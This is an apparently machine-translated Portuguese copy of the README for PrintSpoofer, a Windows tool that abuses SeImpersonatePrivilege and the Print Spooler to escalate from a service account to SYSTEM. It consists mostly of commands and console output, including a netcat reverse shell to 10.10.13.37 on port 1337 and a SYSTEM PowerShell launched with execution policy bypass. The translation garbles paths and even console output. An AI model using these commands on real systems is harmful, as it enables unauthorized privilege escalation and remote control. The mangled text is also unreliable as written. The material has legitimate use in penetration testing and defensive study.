De LOCAL/NETWORK SERVICE para SYSTEM, abusando de SeImpersonatePrivilege
no Windows 10 e Server 2016/2019.
Você pode verificar a mensagem de ajuda usando a opção -h
.
C:TOOLS>PrintSpoofer.exe -h PrintSpoofer v0.1 (por @ itm4n) Desde que o usuário atual tenha o privilégio SeImpersonate, esta ferramenta aproveitará o Print Serviço de spooler para obter um token SYSTEM e, em seguida, executar um comando personalizado com CreateProcessAsUser() Argumentos: -cExecute o comando *CMD* -i Interaja com o novo processo no prompt de comando atual (o padrão é não interativo) -d Gera um novo processo na área de trabalho correspondente a esta sessão *ID* (verifique seu ID com qwinsta) -h Sou eu :) Exemplos: - Execute o PowerShell como SYSTEM no console atual PrintSpoofer.exe -i -c powershell.exe - Gere um prompt de comando SYSTEM na área de trabalho da sessão 1 PrintSpoofer.exe -d 1 -c cmd.exe - Obtenha um shell reverso do SYSTEM PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
Se você tiver um shell interativo , poderá criar um novo processo SYSTEM em seu console atual.
Caso de uso : bind shell, shell reverso, psexec.py
, etc.
C:TOOLS>PrintSpoofer.exe -i -c cmd [+] Privilégio encontrado: SeImpersonatePrivilege [+] Pipe nomeado ouvindo... [+] CreateProcessAsUser() OK Microsoft Windows [versão 10.0.19613.1000] (c) 2020 Microsoft Corporation. Todos os direitos reservados. C: WINDOWSsystem32>whoami sistema de autoridade nt
Se você pode executar comandos , mas não possui um shell interativo, poderá criar um novo processo SYSTEM e sair imediatamente sem interagir com ele.
Caso de uso : WinRM, WebShell, wmiexec.py
, smbexec.py
, etc.
Crie um shell reverso:
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] Privilégio encontrado: SeImpersonatePrivilege [+] Pipe nomeado ouvindo... [+] CreateProcessAsUser() OK
Ouvinte Netcat:
C:TOOLS>nc.exe -l -p 1337 Microsoft Windows [versão 10.0.19613.1000] (c) 2020 Microsoft Corporation. Todos os direitos reservados. C: WINDOWSsystem32>whoami sistema de autoridade nt
Se você estiver conectado localmente ou via RDP (incluindo VDI), poderá gerar um prompt de comando SYSTEM em sua área de trabalho. Primeiro, verifique o ID da sua sessão com o comando qwinsta
e depois especifique esse valor com a opção -d
.
Caso de uso : Sessão de Terminal (RDP), VDI
C: FERRAMENTAS> qwinsta SESSIONNAME NOME DE USUÁRIO ID ESTADO TIPO DISPOSITIVO serviços 0 Disco administrador do console 1 ativo >rdp-tcp#3 lab-user 3 Ativo rdp-tcp 65536 Ouvir C:TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass" [+] Privilégio encontrado: SeImpersonatePrivilege [+] Pipe nomeado ouvindo... [+] CreateProcessAsUser() OK